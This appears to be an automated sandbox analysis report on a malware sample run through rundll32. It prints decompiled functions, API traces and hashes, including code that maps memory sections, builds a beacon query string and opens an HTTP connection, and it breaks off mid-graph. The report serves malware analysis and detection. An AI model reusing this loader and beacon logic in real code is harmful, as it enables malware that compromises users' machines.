                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Section$CreateViewmemset
                          • String ID:
                          • API String ID: 2533685722-0
                          • Opcode ID: 39c6781f9f66cf2048ae46488313ef5fadf544eee56d406a9c41bd712d4d7bd0
                          • Instruction ID: 4be870be015fbb065f88db215cbf778b225fa1cbf32ba3e649a7b7e17bd5b64f
                          • Opcode Fuzzy Hash: 39c6781f9f66cf2048ae46488313ef5fadf544eee56d406a9c41bd712d4d7bd0
                          • Instruction Fuzzy Hash: AE211DB1D00209AFDB11DFA9C8849EEFBF9EF48354F504469E646F3250D7319A488BA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7A806 Relevance: 3.0, APIs: 2, Instructions: 35librarynativeloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcAddress.KERNEL32(?,00000000), ref: 05B7A82F
                          • NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,05B76230,00000000,00000000,00000028,00000100), ref: 05B7A851
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressMemory64ProcReadVirtualWow64
                          • String ID:
                          • API String ID: 752694512-0
                          • Opcode ID: 7573af034db79d837237ef3f1a053b36d025caf1f577ab670f4e6e78f55ee67b
                          • Instruction ID: e4d1545ae26a7bd3f08d9eee6ce6cd2a3567e1157270ee762db7af2a0de1a18f
                          • Opcode Fuzzy Hash: 7573af034db79d837237ef3f1a053b36d025caf1f577ab670f4e6e78f55ee67b
                          • Instruction Fuzzy Hash: B5F04976510108FFCB119F89DC45CAEBFBAFB89710B24405AF914C7220E631B952DB20
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7BE80 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtMapViewOfSection.NTDLL(00000000,000000FF,05B6717E,00000000,00000000,05B6717E,?,00000002,00000000,?,05B6C71A,00000000,05B6717E,000000FF,?), ref: 05B7BEAE
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: SectionView
                          • String ID:
                          • API String ID: 1323581903-0
                          • Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                          • Instruction ID: d78dd43a15d6e5ef207701320a1f262fa425d6f7f835f8d55d12034ea56dbeef
                          • Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                          • Instruction Fuzzy Hash: 9EF012B690020CFFDB119FA5CC85CDFBBBDEB44244B008C69F652D1150D231AE189B60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01006D0A Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                          Download Yara Rule
                          C-Code - Quality: 68%
                          			E01006D0A(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                          0x01006d1c
                          0x01006d22
                          0x01006d30
                          0x01006d37
                          0x01006d3c
                          0x01006d42
                          0x00000000
                          0x01006d43
                          0x00000000

                          APIs
                          • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0100197E,00000002,00000000,?,?,00000000,?,?,0100197E,00000000), ref: 01006D37
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: SectionView
                          • String ID:
                          • API String ID: 1323581903-0
                          • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                          • Instruction ID: 6c7c8c93230ffe923caba7907c670a2770ed566c9fd6435eaf0605693fa5c70d
                          • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                          • Instruction Fuzzy Hash: 70F030B690020CFFEB119FA5CC85CAFBBBDEB44394F10493AF252E5090D6319E588B60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B674AE Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,05B8A400), ref: 05B674C5
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: InformationProcessQuery
                          • String ID:
                          • API String ID: 1778838933-0
                          • Opcode ID: 1fe426cc52185ede6bf0edffb162ee476ccb7dfcbfea287f9f3399c87ed3e5fd
                          • Instruction ID: d75743181df4c65039927f378a6404f1e33cf33aacaa6ebb3dafbd9741cd3f2c
                          • Opcode Fuzzy Hash: 1fe426cc52185ede6bf0edffb162ee476ccb7dfcbfea287f9f3399c87ed3e5fd
                          • Instruction Fuzzy Hash: 97F0E2317040149FCB20CE28D889EABBFBAFB02758B104090F905DB260DB38F901CBE0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010056C8 Relevance: 39.2, APIs: 26, Instructions: 234memorystringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          C-Code - Quality: 70%
                          			E010056C8(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				intOrPtr _t32;
				void* _t33;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				intOrPtr _t38;
				intOrPtr _t39;
				void* _t42;
				intOrPtr _t43;
				int _t46;
				intOrPtr _t47;
				int _t50;
				void* _t51;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				void* _t69;
				intOrPtr _t74;
				intOrPtr _t80;
				intOrPtr _t83;
				intOrPtr _t86;
				int _t89;
				intOrPtr _t90;
				int _t93;
				intOrPtr _t95;
				int _t98;
				intOrPtr _t100;
				int _t103;
				void* _t105;
				void* _t106;
				void* _t110;
				void* _t112;
				void* _t113;
				intOrPtr _t114;
				long _t116;
				intOrPtr* _t117;
				intOrPtr* _t118;
				long _t119;
				int _t120;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t126;
				void* _t127;
				void* _t129;
				void* _t130;

				_t110 = __edx;
				_t106 = __ecx;
				_t127 =  &_v16;
				_t119 = __eax;
				_t32 =  *0x100a3e0; // 0x5299b78
				_v4 = _t32;
				_v8 = 8;
				_t33 = RtlAllocateHeap( *0x100a2d8, 0, 0x800); // executed
				_t105 = _t33;
				if(_t105 != 0) {
					if(_t119 == 0) {
						_t119 = GetTickCount();
					}
					_t35 =  *0x100a018; // 0xd4967592
					asm("bswap eax");
					_t36 =  *0x100a014; // 0x3a87c8cd
					asm("bswap eax");
					_t37 =  *0x100a010; // 0xd8d2f808
					asm("bswap eax");
					_t38 =  *0x100a00c; // 0x81762942
					asm("bswap eax");
					_t39 =  *0x100a348; // 0x428d5a8
					_t3 = _t39 + 0x100b62b; // 0x74666f73
					_t120 = wsprintfA(_t105, _t3, 2, 0x3d175, _t38, _t37, _t36, _t35,  *0x100a02c,  *0x100a004, _t119);
					_t42 = E01006927();
					_t43 =  *0x100a348; // 0x428d5a8
					_t4 = _t43 + 0x100b66b; // 0x74707526
					_t46 = wsprintfA(_t120 + _t105, _t4, _t42);
					_t129 = _t127 + 0x38;
					_t121 = _t120 + _t46;
					if(_a12 != 0) {
						_t100 =  *0x100a348; // 0x428d5a8
						_t8 = _t100 + 0x100b676; // 0x732526
						_t103 = wsprintfA(_t121 + _t105, _t8, _a12);
						_t129 = _t129 + 0xc;
						_t121 = _t121 + _t103;
					}
					_t47 =  *0x100a348; // 0x428d5a8
					_t10 = _t47 + 0x100b2de; // 0x74636126
					_t50 = wsprintfA(_t121 + _t105, _t10, 0);
					_t130 = _t129 + 0xc;
					_t122 = _t121 + _t50; // executed
					_t51 = E010022D7(_t106); // executed
					_t112 = _t51;
					if(_t112 != 0) {
						_t95 =  *0x100a348; // 0x428d5a8
						_t12 = _t95 + 0x100b8d0; // 0x736e6426
						_t98 = wsprintfA(_t122 + _t105, _t12, _t112);
						_t130 = _t130 + 0xc;
						_t122 = _t122 + _t98;
						HeapFree( *0x100a2d8, 0, _t112);
					}
					_t113 = E01002A11();
					if(_t113 != 0) {
						_t90 =  *0x100a348; // 0x428d5a8
						_t14 = _t90 + 0x100b8d8; // 0x6f687726
						_t93 = wsprintfA(_t122 + _t105, _t14, _t113);
						_t130 = _t130 + 0xc;
						_t122 = _t122 + _t93;
						HeapFree( *0x100a2d8, 0, _t113);
					}
					_t114 =  *0x100a3cc; // 0x52995b0
					_a20 = E01002509(0x100a00a, _t114 + 4);
					_t55 =  *0x100a370; // 0x0
					_t116 = 0;
					if(_t55 != 0) {
						_t86 =  *0x100a348; // 0x428d5a8
						_t17 = _t86 + 0x100b8b2; // 0x3d736f26
						_t89 = wsprintfA(_t122 + _t105, _t17, _t55);
						_t130 = _t130 + 0xc;
						_t122 = _t122 + _t89;
					}
					_t56 =  *0x100a36c; // 0x0
					if(_t56 != _t116) {
						_t83 =  *0x100a348; // 0x428d5a8
						_t19 = _t83 + 0x100b889; // 0x3d706926
						wsprintfA(_t122 + _t105, _t19, _t56);
					}
					if(_a20 != _t116) {
						_t123 = RtlAllocateHeap( *0x100a2d8, _t116, 0x800);
						if(_t123 != _t116) {
							E01001BE9(GetTickCount());
							_t62 =  *0x100a3cc; // 0x52995b0
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0x100a3cc; // 0x52995b0
							__imp__(_t66 + 0x40);
							_t68 =  *0x100a3cc; // 0x52995b0
							_t69 = E01001D33(1, _t110, _t105,  *_t68); // executed
							_t126 = _t69;
							asm("lock xadd [eax], ecx");
							if(_t126 != _t116) {
								StrTrimA(_t126, 0x100928c);
								_push(_t126);
								_t74 = E0100393C();
								_v20 = _t74;
								if(_t74 != _t116) {
									_t117 = __imp__;
									 *_t117(_t126, _v8);
									 *_t117(_t123, _v8);
									_t118 = __imp__;
									 *_t118(_t123, _v32);
									 *_t118(_t123, _t126);
									_t80 = E0100375F(0xffffffffffffffff, _t123, _v28, _v24); // executed
									_v56 = _t80;
									if(_t80 != 0 && _t80 != 0x10d2) {
										E0100561E();
									}
									HeapFree( *0x100a2d8, 0, _v48);
									_t116 = 0;
								}
								HeapFree( *0x100a2d8, _t116, _t126);
							}
							RtlFreeHeap( *0x100a2d8, _t116, _t123); // executed
						}
						HeapFree( *0x100a2d8, _t116, _a12);
					}
					RtlFreeHeap( *0x100a2d8, _t116, _t105); // executed
				}
				return _v16;
			}





























































                          0x010056c8
                          0x010056c8
                          0x010056c8
                          0x010056dd
                          0x010056df
                          0x010056e4
                          0x010056e8
                          0x010056f0
                          0x010056f6
                          0x010056fa
                          0x01005702
                          0x0100570a
                          0x0100570a
                          0x0100570c
                          0x01005718
                          0x01005727
                          0x0100572c
                          0x0100572f
                          0x01005734
                          0x01005737
                          0x0100573c
                          0x0100573f
                          0x0100574b
                          0x01005758
                          0x0100575a
                          0x01005760
                          0x01005765
                          0x01005770
                          0x01005772
                          0x01005775
                          0x0100577b
                          0x0100577d
                          0x01005786
                          0x01005791
                          0x01005793
                          0x01005796
                          0x01005796
                          0x01005798
                          0x0100579d
                          0x010057a9
                          0x010057ab
                          0x010057ae
                          0x010057b0
                          0x010057b5
                          0x010057b9
                          0x010057bb
                          0x010057c0
                          0x010057cc
                          0x010057ce
                          0x010057da
                          0x010057dc
                          0x010057dc
                          0x010057e7
                          0x010057eb
                          0x010057ed
                          0x010057f2
                          0x010057fe
                          0x01005800
                          0x0100580c
                          0x0100580e
                          0x0100580e
                          0x01005814
                          0x01005827
                          0x0100582b
                          0x01005830
                          0x01005834
                          0x01005837
                          0x0100583c
                          0x01005847
                          0x01005849
                          0x0100584c
                          0x0100584c
                          0x0100584e
                          0x01005855
                          0x01005858
                          0x0100585d
                          0x01005867
                          0x01005869
                          0x01005870
                          0x01005888
                          0x0100588c
                          0x01005898
                          0x0100589d
                          0x010058a6
                          0x010058b7
                          0x010058bb
                          0x010058c4
                          0x010058ca
                          0x010058d2
                          0x010058d7
                          0x010058e4
                          0x010058ea
                          0x010058f6
                          0x010058fc
                          0x010058fd
                          0x01005902
                          0x01005908
                          0x0100590e
                          0x01005915
                          0x0100591c
                          0x01005922
                          0x01005929
                          0x0100592d
                          0x01005938
                          0x0100593d
                          0x01005943
                          0x0100594c
                          0x0100594c
                          0x0100595d
                          0x01005963
                          0x01005963
                          0x0100596d
                          0x0100596d
                          0x0100597b
                          0x0100597b
                          0x0100598c
                          0x0100598c
                          0x0100599a
                          0x0100599a
                          0x010059ab

                          APIs
                          • RtlAllocateHeap.NTDLL ref: 010056F0
                          • GetTickCount.KERNEL32 ref: 01005704
                          • wsprintfA.USER32 ref: 01005753
                          • wsprintfA.USER32 ref: 01005770
                          • wsprintfA.USER32 ref: 01005791
                          • wsprintfA.USER32 ref: 010057A9
                          • wsprintfA.USER32 ref: 010057CC
                          • HeapFree.KERNEL32(00000000,00000000), ref: 010057DC
                          • wsprintfA.USER32 ref: 010057FE
                          • HeapFree.KERNEL32(00000000,00000000), ref: 0100580E
                          • wsprintfA.USER32 ref: 01005847
                          • wsprintfA.USER32 ref: 01005867
                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01005882
                          • GetTickCount.KERNEL32 ref: 01005892
                          • RtlEnterCriticalSection.NTDLL(05299570), ref: 010058A6
                          • RtlLeaveCriticalSection.NTDLL(05299570), ref: 010058C4
                          • StrTrimA.SHLWAPI(00000000,0100928C,00000000,052995B0), ref: 010058F6
                          • lstrcpy.KERNEL32(00000000,?), ref: 01005915
                          • lstrcpy.KERNEL32(00000000,?), ref: 0100591C
                          • lstrcat.KERNEL32(00000000,?), ref: 01005929
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0100592D
                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 0100595D
                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0100596D
                          • RtlFreeHeap.NTDLL(00000000,00000000,00000000,052995B0), ref: 0100597B
                          • HeapFree.KERNEL32(00000000,?), ref: 0100598C
                          • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0100599A
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$wsprintf$Free$AllocateCountCriticalSectionTicklstrcatlstrcpy$EnterLeaveTrim
                          • String ID:
                          • API String ID: 2591679948-0
                          • Opcode ID: 9d9723d86d4e540f6e002e6bbcd58ad132a20815f18463f1d6999ec0b9c9aa29
                          • Instruction ID: 63739c4a0418e8483826ed25c24d61f608957e1d359c298f63f8577be4432233
                          • Opcode Fuzzy Hash: 9d9723d86d4e540f6e002e6bbcd58ad132a20815f18463f1d6999ec0b9c9aa29
                          • Instruction Fuzzy Hash: 10818C71600204EFD733EB68EC48E9A3BE8EB88714F050524F9C8D7265DA3BE904DB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B634FF Relevance: 21.1, APIs: 14, Instructions: 126memorysynchronizationCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 143 5b634ff-5b63510 144 5b63564-5b6356f 143->144 145 5b63512-5b6351e call 5b61268 call 5b7e869 143->145 146 5b63576-5b63588 call 5b72650 144->146 147 5b63571 call 5b69e82 144->147 157 5b63524-5b63531 SleepEx 145->157 154 5b6358a-5b63597 ReleaseMutex FindCloseChangeNotification 146->154 155 5b63599-5b635a0 146->155 147->146 154->155 158 5b635a2-5b635af ResetEvent CloseHandle 155->158 159 5b635b1-5b635be SleepEx 155->159 157->157 161 5b63533-5b6353a 157->161 158->159 159->159 160 5b635c0 159->160 162 5b635c5-5b635d2 SleepEx 160->162 163 5b63550-5b63562 RtlDeleteCriticalSection * 2 161->163 164 5b6353c-5b63542 161->164 165 5b635d4-5b635d9 162->165 166 5b635db-5b635e2 162->166 163->144 164->163 167 5b63544-5b6354b call 5b7e803 164->167 165->162 165->166 168 5b635e4-5b635ed HeapFree 166->168 169 5b635f3-5b635fa 166->169 167->163 168->169 171 5b63602-5b63608 169->171 172 5b635fc-5b635fd call 5b783fa 169->172 174 5b6360a-5b63611 171->174 175 5b63619-5b63620 171->175 172->171 174->175 176 5b63613-5b63615 174->176 177 5b63622-5b63623 RtlRemoveVectoredExceptionHandler 175->177 178 5b63629-5b6362f 175->178 176->175 177->178 179 5b63636 178->179 180 5b63631 call 5b69131 178->180 182 5b6363b-5b63648 SleepEx 179->182 180->179 183 5b63651-5b6365a 182->183 184 5b6364a-5b6364f 182->184 185 5b63672-5b63682 LocalFree 183->185 186 5b6365c-5b63661 183->186 184->182 184->183 186->185 187 5b63663 186->187 188 5b63666-5b63670 FindCloseChangeNotification 187->188 188->185 188->188
                          APIs
                          • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,05B7E846), ref: 05B63528
                          • RtlDeleteCriticalSection.NTDLL(05B8A3E0), ref: 05B6355B
                          • RtlDeleteCriticalSection.NTDLL(05B8A400), ref: 05B63562
                          • ReleaseMutex.KERNEL32(000005C8,00000000,?,?,?,05B7E846), ref: 05B6358B
                          • FindCloseChangeNotification.KERNEL32(?,?,05B7E846), ref: 05B63597
                          • ResetEvent.KERNEL32(00000000,00000000,?,?,?,05B7E846), ref: 05B635A3
                          • CloseHandle.KERNEL32(?,?,05B7E846), ref: 05B635AF
                          • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,05B7E846), ref: 05B635B5
                          • SleepEx.KERNEL32(00000064,00000001,?,?,05B7E846), ref: 05B635C9
                          • HeapFree.KERNEL32(00000000,00000000,?,?,05B7E846), ref: 05B635ED
                          • RtlRemoveVectoredExceptionHandler.NTDLL(059805B8), ref: 05B63623
                          • SleepEx.KERNEL32(00000064,00000001,?,?,05B7E846), ref: 05B6363F
                          • FindCloseChangeNotification.KERNEL32(05FBF2C8,?,?,05B7E846), ref: 05B63668
                          • LocalFree.KERNEL32(?,?,05B7E846), ref: 05B63678
                            • Part of subcall function 05B61268: GetVersion.KERNEL32(?,?,76CDF720,?,05B63517,00000000,?,?,?,05B7E846), ref: 05B6128C
                            • Part of subcall function 05B61268: GetModuleHandleA.KERNEL32(?,05FB97B5,?,76CDF720,?,05B63517,00000000,?,?,?,05B7E846), ref: 05B612A9
                            • Part of subcall function 05B61268: GetProcAddress.KERNEL32(00000000), ref: 05B612B0
                            • Part of subcall function 05B7E869: RtlEnterCriticalSection.NTDLL(05B8A400), ref: 05B7E873
                            • Part of subcall function 05B7E869: RtlLeaveCriticalSection.NTDLL(05B8A400), ref: 05B7E8AF
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSectionSleep$Close$ChangeDeleteFindFreeHandleNotification$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
                          • String ID:
                          • API String ID: 1259384122-0
                          • Opcode ID: 83fb4acd2671761e5383bdf09e1d65ca548b7ac10873cc8da0fa647e500a2e93
                          • Instruction ID: cf0b1bfa08e14bc62cc641f5920df9d73126912425783ba8f99094fe01c98989
                          • Opcode Fuzzy Hash: 83fb4acd2671761e5383bdf09e1d65ca548b7ac10873cc8da0fa647e500a2e93
                          • Instruction Fuzzy Hash: 4E418431714201ABDB20BF65ED86A357BEAFB01B61BA524A6F601D7280DF78F840CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01007AF1 Relevance: 19.6, APIs: 13, Instructions: 126networkstringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          C-Code - Quality: 92%
                          			E01007AF1(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E01006D63(__eax + __eax + 1);
				if(_t56 != 0) {
					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
						E01006C2C(_t56);
					} else {
						E01006C2C( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E01007A86) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E01006E40( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x100a348; // 0x428d5a8
						_t15 = _t59 + 0x100b73b; // 0x544547
						_v8 = 0x84404000;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}














                          0x01007af1
                          0x01007af1
                          0x01007afc
                          0x01007b03
                          0x01007b0b
                          0x01007b15
                          0x01007b1b
                          0x01007b2e
                          0x01007b3e
                          0x01007b30
                          0x01007b33
                          0x01007b38
                          0x01007b38
                          0x01007b2e
                          0x01007b4e
                          0x01007b54
                          0x01007b59
                          0x01007c42
                          0x00000000
                          0x01007b74
                          0x01007b77
                          0x01007b8a
                          0x01007b90
                          0x01007b95
                          0x01007bbd
                          0x01007bd0
                          0x01007bda
                          0x01007bdd
                          0x01007be3
                          0x01007be8
                          0x00000000
                          0x00000000
                          0x01007bec
                          0x01007bf8
                          0x01007c09
                          0x01007c0b
                          0x01007c1c
                          0x01007c1c
                          0x01007c2c
                          0x00000000
                          0x01007c3e
                          0x00000000
                          0x01007c3e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01007b95

                          APIs
                          • lstrlen.KERNEL32(?,00000008,76C84D40), ref: 01007B03
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 01007B26
                          • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 01007B4E
                          • InternetSetStatusCallback.WININET(00000000,01007A86), ref: 01007B65
                          • ResetEvent.KERNEL32(?), ref: 01007B77
                          • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 01007B8A
                          • GetLastError.KERNEL32 ref: 01007B97
                          • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 01007BDD
                          • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 01007BFB
                          • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 01007C1C
                          • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 01007C28
                          • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 01007C38
                          • GetLastError.KERNEL32 ref: 01007C42
                            • Part of subcall function 01006C2C: RtlFreeHeap.NTDLL(00000000,00000000,01005E1D,00000000,?,?,00000000), ref: 01006C38
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                          • String ID:
                          • API String ID: 2290446683-0
                          • Opcode ID: ebfffffa7f55695b5ce87c7658f10c965ae6f2b4b09160d3e1a340102d5b2b13
                          • Instruction ID: 81f9f34f5dfd44b988539ff9025ed682072754e295318464984831eb982dcc7b
                          • Opcode Fuzzy Hash: ebfffffa7f55695b5ce87c7658f10c965ae6f2b4b09160d3e1a340102d5b2b13
                          • Instruction Fuzzy Hash: 47416F71600708BFE7329F65DC49E9B7FB9EB85740F104969B6C2D2191D63AA644CB20
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01007F35 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 243 1007f35-1007f9a 244 1007fbb-1007fe5 243->244 245 1007f9c-1007fb6 RaiseException 243->245 247 1007fe7 244->247 248 1007fea-1007ff6 244->248 246 100816b-100816f 245->246 247->248 249 1007ff8-1008003 248->249 250 1008009-100800b 248->250 249->250 262 100814e-1008155 249->262 251 1008011-1008018 250->251 252 10080b3-10080bd 250->252 256 1008028-1008035 LoadLibraryA 251->256 257 100801a-1008026 251->257 254 10080c9-10080cb 252->254 255 10080bf-10080c7 252->255 258 1008149-100814c 254->258 259 10080cd-10080d0 254->259 255->254 260 1008037-1008047 GetLastError 256->260 261 1008078-1008084 InterlockedExchange 256->261 257->256 257->261 258->262 266 10080d2-10080d5 259->266 267 10080fe-100810c GetProcAddress 259->267 268 1008057-1008073 RaiseException 260->268 269 1008049-1008055 260->269 270 1008086-100808a 261->270 271 10080ac-10080ad FreeLibrary 261->271 263 1008157-1008164 262->263 264 1008169 262->264 263->264 264->246 266->267 273 10080d7-10080e2 266->273 267->258 274 100810e-100811e GetLastError 267->274 268->246 269->261 269->268 270->252 275 100808c-1008098 LocalAlloc 270->275 271->252 273->267 276 10080e4-10080ea 273->276 278 1008120-1008128 274->278 279 100812a-100812c 274->279 275->252 280 100809a-10080aa 275->280 276->267 281 10080ec-10080ef 276->281 278->279 279->258 282 100812e-1008146 RaiseException 279->282 280->252 281->267 283 